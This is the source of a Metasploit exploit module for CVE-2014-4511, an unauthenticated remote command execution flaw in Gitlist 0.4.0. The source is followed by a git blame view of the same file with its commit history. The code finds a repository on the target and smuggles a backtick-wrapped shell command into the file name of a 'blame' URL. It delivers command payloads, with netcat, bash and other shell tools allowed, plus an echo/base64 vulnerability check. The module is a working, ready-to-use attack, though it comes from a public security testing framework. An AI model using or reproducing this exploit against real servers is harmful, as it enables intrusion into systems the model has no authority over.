metasploit-framework/modules/exploits/linux/http/gitlist_exec.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Gitlist Unauthenticated Remote Command Execution',
      'Description'    => %q{
          This module exploits an unauthenticated remote command execution vulnerability
        in version 0.4.0 of Gitlist. The problem exists in the handling of an specially
        crafted file name when trying to blame it.
      },
      'License'        => MSF_LICENSE,
      'Privileged'     => false,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Author'         =>
        [
          'drone', #discovery/poc by @dronesec
          'Brandon Perry <bperry.volatile[at]gmail.com>' #Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2014-4511'],
          ['EDB', '33929'],
          ['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/']
        ],
      'Payload'        =>
        {
          'Space'       => 8192, # max length of GET request really
          'BadChars'    => "&\x20",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl',
            }
        },
      'Targets'        =>
        [
          ['Gitlist 0.4.0', { }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 30 2014'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
      ], self.class)
  end

  def check
    repo = get_repo

    if repo.nil?
      return Exploit::CheckCode::Unknown
    end

    chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))

    res = send_command(repo, "echo${IFS}" + chk + "|base64${IFS}--decode")

    if res && res.body
      if res.body.include?(Rex::Text.decode_base64(chk))
        return Exploit::CheckCode::Vulnerable
      elsif res.body.to_s =~ /sh.*not found/
        return Exploit::CheckCode::Vulnerable
      end
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    repo = get_repo
    if repo.nil?
      fail_with(Failure::Unknown, "#{peer} - Failed to retrieve the remote repository")
    end
    send_command(repo, payload.encoded)
  end

  def get_repo
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "/")
    })

    unless res
      return nil
    end

    first_repo = /href="\/gitlist\/(.*)\/"/.match(res.body)

    unless first_repo && first_repo.length >= 2
      return nil
    end

    repo_name = first_repo[1]

    repo_name
  end

  def send_command(repo, cmd)
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, repo, 'blame', 'master', '""`' + cmd + '`')
    }, 1)

    res
  end

end
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
			`super(update_info(info,`
Clean code 2014-07-04 21:40:16 +00:00			`'Name' => 'Gitlist Unauthenticated Remote Command Execution',`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`'Description' => %q{`
Clean code 2014-07-04 21:40:16 +00:00			`This module exploits an unauthenticated remote command execution vulnerability`
			`in version 0.4.0 of Gitlist. The problem exists in the handling of an specially`
			`crafted file name when trying to blame it.`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`},`
			`'License' => MSF_LICENSE,`
Update gitlist_exec.rb 2014-07-03 17:40:37 +00:00			`'Privileged' => false,`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
			`'Author' =>`
			`[`
Clean code 2014-07-04 21:40:16 +00:00			`'drone', #discovery/poc by @dronesec`
Fix email format 2014-07-11 17:45:23 +00:00			`'Brandon Perry <bperry.volatile[at]gmail.com>' #Metasploit module`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`],`
			`'References' =>`
			`[`
			`['CVE', '2014-4511'],`
Clean code 2014-07-04 21:40:16 +00:00			`['EDB', '33929'],`
			`['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/']`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`],`
			`'Payload' =>`
			`{`
Clean code 2014-07-04 21:40:16 +00:00			`'Space' => 8192, # max length of GET request really`
			`'BadChars' => "&\x20",`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`'DisableNops' => true,`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
Clean code 2014-07-04 21:40:16 +00:00			`'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl',`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`}`
			`},`
			`'Targets' =>`
			`[`
address @jvasquez-r7 review points 2014-07-03 21:43:01 +00:00			`['Gitlist 0.4.0', { }]`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Jun 30 2014'`
			`))`

			`register_options(`
			`[`
typo 2014-07-01 01:15:25 +00:00			`OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`], self.class)`
			`end`

			`def check`
Clean code 2014-07-04 21:40:16 +00:00			`repo = get_repo`

			`if repo.nil?`
			`return Exploit::CheckCode::Unknown`
			`end`

address @jvasquez-r7 review points 2014-07-03 21:43:01 +00:00			`chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00
Clean code 2014-07-04 21:40:16 +00:00			`res = send_command(repo, "echo${IFS}" + chk + "\|base64${IFS}--decode")`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00
Clean code 2014-07-04 21:40:16 +00:00			`if res && res.body`
			`if res.body.include?(Rex::Text.decode_base64(chk))`
			`return Exploit::CheckCode::Vulnerable`
			`elsif res.body.to_s =~ /sh.*not found/`
			`return Exploit::CheckCode::Vulnerable`
			`end`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`end`

Clean code 2014-07-04 21:40:16 +00:00			`Exploit::CheckCode::Safe`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`end`

			`def exploit`
Clean code 2014-07-04 21:40:16 +00:00			`repo = get_repo`
			`if repo.nil?`
			`fail_with(Failure::Unknown, "#{peer} - Failed to retrieve the remote repository")`
			`end`
			`send_command(repo, payload.encoded)`
address @jvasquez-r7 review points 2014-07-03 21:43:01 +00:00			`end`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00
Clean code 2014-07-04 21:40:16 +00:00			`def get_repo`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`res = send_request_cgi({`
Clean code 2014-07-04 21:40:16 +00:00			`'uri' => normalize_uri(target_uri.path, "/")`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`})`

address @jvasquez-r7 review points 2014-07-03 21:43:01 +00:00			`unless res`
Clean code 2014-07-04 21:40:16 +00:00			`return nil`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`end`

Clean code 2014-07-04 21:40:16 +00:00			`first_repo = /href="\/gitlist\/(.*)\/"/.match(res.body)`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00
Clean code 2014-07-04 21:40:16 +00:00			`unless first_repo && first_repo.length >= 2`
			`return nil`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`end`

Clean code 2014-07-04 21:40:16 +00:00			`repo_name = first_repo[1]`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00
Clean code 2014-07-04 21:40:16 +00:00			`repo_name`
			`end`

			`def send_command(repo, cmd)`
address @jvasquez-r7 review points 2014-07-03 21:43:01 +00:00			`res = send_request_cgi({`
Clean code 2014-07-04 21:40:16 +00:00			'uri' => normalize_uri(target_uri.path, repo, 'blame', 'master', '""`' + cmd + '`')
			`}, 1)`
address @jvasquez-r7 review points 2014-07-03 21:43:01 +00:00
Clean code 2014-07-04 21:40:16 +00:00			`res`
Create gitlist_exec.rb This adds a metasploit module for CVE-2014-4511 2014-07-01 01:10:24 +00:00			`end`

			`end`